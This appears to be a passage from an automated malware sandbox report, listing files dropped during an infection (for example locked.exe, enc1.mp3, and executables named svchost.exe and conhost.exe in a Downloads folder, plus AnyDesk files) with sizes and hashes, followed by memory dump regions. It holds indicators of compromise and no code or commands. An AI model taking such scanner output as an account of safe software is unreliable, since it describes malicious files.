                                                                                                                65d7b0e9849be6d7ff0706388734be0181b40afde726a8e3949b71ee8ae4dcea102fe2f378913e0e26e2a849d3fc6b97760520c3631288090ca112e4198a3d6d

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Roaming\enc1.mp3
                                                                                                                Filesize

                                                                                                                486KB

                                                                                                                MD5

                                                                                                                bbb44733d6b0bd75d6a26a9a4427705f

                                                                                                                SHA1

                                                                                                                c29d6ec521f30efb23331648a4a7a234b2db3894

                                                                                                                SHA256

                                                                                                                33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507

                                                                                                                SHA512

                                                                                                                b846dce3ed1814e17b4f1a43910589e752e2ac911132d18275ff4d179796f1e7928a32636327a681d7c01edd704bec2efc8a12692597205bb334895c9063ceb3

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\AppData\Roaming\locked.exe
                                                                                                                Filesize

                                                                                                                122KB

                                                                                                                MD5

                                                                                                                6d97d6c2be27f7633da8432a5f90ccd2

                                                                                                                SHA1

                                                                                                                5ffca0110e122848b772e563f74c057d7f782664

                                                                                                                SHA256

                                                                                                                47b78d957e366dbf484d44bca911f41a7a795309e0d3e4c9d08fdc135efbb77a

                                                                                                                SHA512

                                                                                                                518e5678a7631258f2373d7f76987f668531e972e04d5bdbdf8aacb2e2a568af618b1e4f338a289edf11e419cc6b4813e95c4433e0e849243d10e10a895cbfce

                                                                                                                Download Submit

                                                                                                              • C:\Users\Admin\Downloads\AnyDesk.exe
                                                                                                                Filesize

                                                                                                                5.1MB

                                                                                                                MD5

                                                                                                                aee6801792d67607f228be8cec8291f9

                                                                                                                SHA1

                                                                                                                bf6ba727ff14ca2fddf619f292d56db9d9088066

                                                                                                                SHA256

                                                                                                                1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499

                                                                                                                SHA512

                                                                                                                09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

                                                                                                                Download Submit

                                                                                                              • C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf
                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                d98028bbb86f10f528c9aed4b624d7b7

                                                                                                                SHA1

                                                                                                                79094e236815c587e6dd907d4dda93978e9f3885

                                                                                                                SHA256

                                                                                                                59f350c8eb4cb0c3ba2cc26fede240bcc69cc578ff4530e59469f2f95c3e38ef

                                                                                                                SHA512

                                                                                                                e85e56f6541a0f54019d58152bf5f58db2e2887349cc6985c3b9c4fb5835a8f3554ca9f5474b609ee366de6d6b6b7aaa355f8bdae1b3983a5041148766a6a5cc

                                                                                                                Download Submit

                                                                                                              • C:\users\Admin\downloads\conhost.exe
                                                                                                                Filesize

                                                                                                                120KB

                                                                                                                MD5

                                                                                                                ed4dc64d9940cae8a4ee5ee11f173899

                                                                                                                SHA1

                                                                                                                39476f1d852d3fb66a4083ddfb2244ebc84d5fb0

                                                                                                                SHA256

                                                                                                                49f011400451dc569c8828e8a28f74e3634e9f5bb4d3908c518c4c7d4955a18f

                                                                                                                SHA512

                                                                                                                5cb60f856110b7114c83805ed830a6e82e815caa8ac7cc2e07e6fc977aa5a7180a9b8d1b10df5304d5b9d063e5d39f5468a5a9c74c895c0a4c491c30292e86b1

                                                                                                                Download Submit

                                                                                                              • C:\users\Admin\downloads\stn.exe
                                                                                                                Filesize

                                                                                                                120KB

                                                                                                                MD5

                                                                                                                a305e6c31b6d88e34612b66b0300b4e2

                                                                                                                SHA1

                                                                                                                35e9b585534d1b423703f38e33b5a47498b95b6f

                                                                                                                SHA256

                                                                                                                b23f9d126ccf76e954e695cb575e50389f26376abf0afb9e13e0c2eb28fd21d8

                                                                                                                SHA512

                                                                                                                c7c2a96e68c17093e42a8c7a39d582643703817d2aa28c75704630941c80eabba3ad76068e079a034a915610857b55a6a75d5a3b9ebf8b07843b6e9af4a00db0

                                                                                                                Download Submit

                                                                                                              • C:\users\Admin\downloads\svchost.exe
                                                                                                                Filesize

                                                                                                                120KB

                                                                                                                MD5

                                                                                                                2023c20ca267a131567c313c91457d6f

                                                                                                                SHA1

                                                                                                                3e33bba998990a433420d4f029787eeda0ebaa9a

                                                                                                                SHA256

                                                                                                                79d9115fa235d0bc1c83a25d512612b156a83ac54b4c6c7cd96cf4c6f1a15d53

                                                                                                                SHA512

                                                                                                                aae271c8e94584c487552951e0e5c8dd679cfcd8b2e3ba8118039776f187c0429f9cfebe04e59d4196181325c931d151be467b2624049380ee89829f05a20a6a

                                                                                                                Download Submit

                                                                                                              • memory/512-266-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/512-293-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/1372-162-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/1372-618-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/1400-619-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/1400-262-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/1708-50-0x00000000004B0000-0x0000000001BF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/1708-150-0x00000000004B0000-0x0000000001BF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/2804-42-0x00000000004B0000-0x0000000001BF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/2804-260-0x00000000004B0000-0x0000000001BF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/3364-37-0x0000021266B10000-0x0000021266B32000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                                Download

                                                                                                              • memory/4856-51-0x00000000004B0000-0x0000000001BF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/4856-149-0x00000000004B0000-0x0000000001BF9000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/5216-634-0x00007FFA9CAA0000-0x00007FFA9CAC1000-memory.dmp

                                                                                                                Filesize

                                                                                                                132KB

                                                                                                                Download

                                                                                                              • memory/5216-640-0x000002336DBB0000-0x000002336EC60000-memory.dmp

                                                                                                                Filesize

                                                                                                                16.7MB

                                                                                                                Download

                                                                                                              • memory/5216-620-0x00007FF6F3BF0000-0x00007FF6F3CE8000-memory.dmp

                                                                                                                Filesize

                                                                                                                992KB

                                                                                                                Download

                                                                                                              • memory/5216-621-0x00007FFA9D0B0000-0x00007FFA9D0E4000-memory.dmp

                                                                                                                Filesize

                                                                                                                208KB

                                                                                                                Download

                                                                                                              • memory/5216-635-0x00007FFA9CA80000-0x00007FFA9CA98000-memory.dmp

                                                                                                                Filesize

                                                                                                                96KB

                                                                                                                Download

                                                                                                              • memory/5216-633-0x00007FFA9CAD0000-0x00007FFA9CB11000-memory.dmp

                                                                                                                Filesize

                                                                                                                260KB

                                                                                                                Download

                                                                                                              • memory/5216-622-0x00007FFA9CDF0000-0x00007FFA9D0A6000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.7MB

                                                                                                                Download

                                                                                                              • memory/5216-637-0x00007FFA9CA40000-0x00007FFA9CA51000-memory.dmp

                                                                                                                Filesize

                                                                                                                68KB

                                                                                                                Download

                                                                                                              • memory/5216-625-0x00007FFA9E960000-0x00007FFA9E978000-memory.dmp

                                                                                                                Filesize

                                                                                                                96KB

                                                                                                                Download

                                                                                                              • memory/5216-638-0x00007FFA9CA20000-0x00007FFA9CA31000-memory.dmp

                                                                                                                Filesize

                                                                                                                68KB

                                                                                                                Download

                                                                                                              • memory/5216-639-0x00007FFA9CA00000-0x00007FFA9CA1B000-memory.dmp

                                                                                                                Filesize

                                                                                                                108KB

                                                                                                                Download

                                                                                                              • memory/5216-636-0x00007FFA9CA60000-0x00007FFA9CA71000-memory.dmp

                                                                                                                Filesize

                                                                                                                68KB

                                                                                                                Download

                                                                                                              • memory/5216-626-0x00007FFA9CDD0000-0x00007FFA9CDE7000-memory.dmp

                                                                                                                Filesize

                                                                                                                92KB

                                                                                                                Download

                                                                                                              • memory/5216-630-0x00007FFA9CD50000-0x00007FFA9CD6D000-memory.dmp

                                                                                                                Filesize

                                                                                                                116KB

                                                                                                                Download

                                                                                                              • memory/5216-627-0x00007FFA9CDB0000-0x00007FFA9CDC1000-memory.dmp

                                                                                                                Filesize

                                                                                                                68KB

                                                                                                                Download

                                                                                                              • memory/5216-628-0x00007FFA9CD90000-0x00007FFA9CDA7000-memory.dmp

                                                                                                                Filesize

                                                                                                                92KB

                                                                                                                Download

                                                                                                              • memory/5216-629-0x00007FFA9CD70000-0x00007FFA9CD81000-memory.dmp

                                                                                                                Filesize

                                                                                                                68KB

                                                                                                                Download

                                                                                                              • memory/5216-631-0x00007FFA9CD30000-0x00007FFA9CD41000-memory.dmp

                                                                                                                Filesize

                                                                                                                68KB

                                                                                                                Download

                                                                                                              • memory/5216-632-0x00007FFA9CB20000-0x00007FFA9CD2B000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                                Download

                                                                                                              • memory/5488-916-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/5592-328-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/5592-313-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download

                                                                                                              • memory/6908-876-0x0000000000310000-0x0000000001A59000-memory.dmp

                                                                                                                Filesize

                                                                                                                23.3MB

                                                                                                                Download